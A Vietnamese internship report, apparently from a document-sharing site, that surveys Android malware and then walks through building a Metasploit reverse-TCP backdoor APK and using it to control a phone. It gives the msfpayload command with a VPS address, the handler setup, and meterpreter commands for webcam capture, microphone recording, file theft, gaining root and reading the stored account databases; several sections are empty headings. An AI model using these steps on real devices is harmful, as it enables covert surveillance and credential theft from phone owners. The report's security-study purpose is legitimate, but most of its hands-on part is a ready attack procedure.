Báo Cáo Thực Tập
2.2. Sự khác nhau về giao diện.Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.
2.3. Sự khác nhau về tính năng.
2.4. Sự khác nhau về giao thức mạng.
3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm 4. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar)4.1. Thực trạngMột báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android. Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của Google vừa được hãng bảo mật Kaspersky Lab công bố. Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Android trong quý I năm 2013. Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di động bằng tổng số lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh hưởng nặng nhất. Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã độc được phát tán dễ dàng hơn trên nền tảng di động này. Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu dựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link có chứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của hacker. 4.2. Nghiên cứu lỗ hổng bảo mật trên Android.4.2.1. Malware trên Android.Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy. 4.2.2 Cơ chế hoạt động của Malware.Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: - Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. - Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Mục đích của Malware DroidDream DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 4.3. Cài đặt trojan trên Android (iCalendar)1.Dùng công cụ apktool để chỉnh sửa file apk apktool if name.apk apktool d name.apk apktool b name
5.1 Tìm hiểu Kali LinuxKali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa
Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: Đặt tên và đặt đường dẫn cho máy ảo Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường... Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!
Phần Partition chọn Guided – use entire disk và All files in one partition Chọn Finish partitioning and write changes to disk Chọn Yes Nhấn continue để bắt đầu cài đặt khoảng 15 phút. Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader. Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước. Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network Bấm vào Edit -> Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor. Tiếp theo, gõ lệnh msfconsole Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080 – nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp: Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem thông tin về máy, nhập lệnh SysInfo
Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard Dùng lệnh cd /sdcard/Download để vào thư mục Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục root của máy Kali II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET1.TRIỂN KHAI LÊN VPS1.1 Cài đặt Metasploit lên VPS1. Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 2. Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu. Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Chọn server và ngày hết hạn, để mặc định: Quá trình cài đặt của Metasploit: Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình: Sau khi Finish trình duyệt web mở lên và đi tới giao diện Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNETCác bước thực hiện
Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132
Để xem các lệnh ta gõ help Để xem thông tin về máy, nhập lệnh SysInfo Để xem các tác vụ đang chạy gõ ps Xem ip gõ ipconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước.
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download App.apk để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami
Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬPNhững kiến thức lý thuyết đã được củng cố:
Những kỹ năng thực hành đã được học thêm:
Những kinh nghiệm thực tiễn đã tích lũy được: Qua gần 3 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử. Каталог: data -> file -> 2015 -> Thang01 Thang01 -> Nguyên mẫu không có To Thang01 -> ĐỀ thi chính thức học kỳ I năm họC 2011-2012 LỚP 11 MÔn thi Thang01 -> Bài 51: Cho hai hình vuông abcd và mnpq như trong hình vẽ. Biết bd = 12 cm. Hãy tính diện tích phần gạch chéo. Bài giải Thang01 -> PHÒng gd – Đt chưƠng mỹ ĐỀ̀ thi học sinh giỏi năM 2011-2012 Thang01 -> Bài tập kết hợp thì hiện tại đơn và hiện tại tiếp diễn Thang01 -> BÀi tập tiếng anh thì hiện tại hoàn thành chia động từ ở thì hiện tại hoàn thành Thang01 -> BÀi tập về nhôm và HỢp chất củA nhôm a. Kim loại tác dụng với bazơ VÀ BÀi toán lưỠng tíNH Thang01 -> BÀi luận tiếng anh mẫu theo chủ ĐỀ phầN 1 Life in the city Thang01 -> You should spend about 20 minutes on Question 1-15, which are base on Reading passage 1 below Thang01 -> BÀi tập tiếng anh lớP 11 Ôn thi học kỳ II relative pronouns, clauses and adverbs I. Chọn a, b, c hoặc d để hoàn thành câu tải về 137.1 Kb. Chia sẻ với bạn bè của bạn: |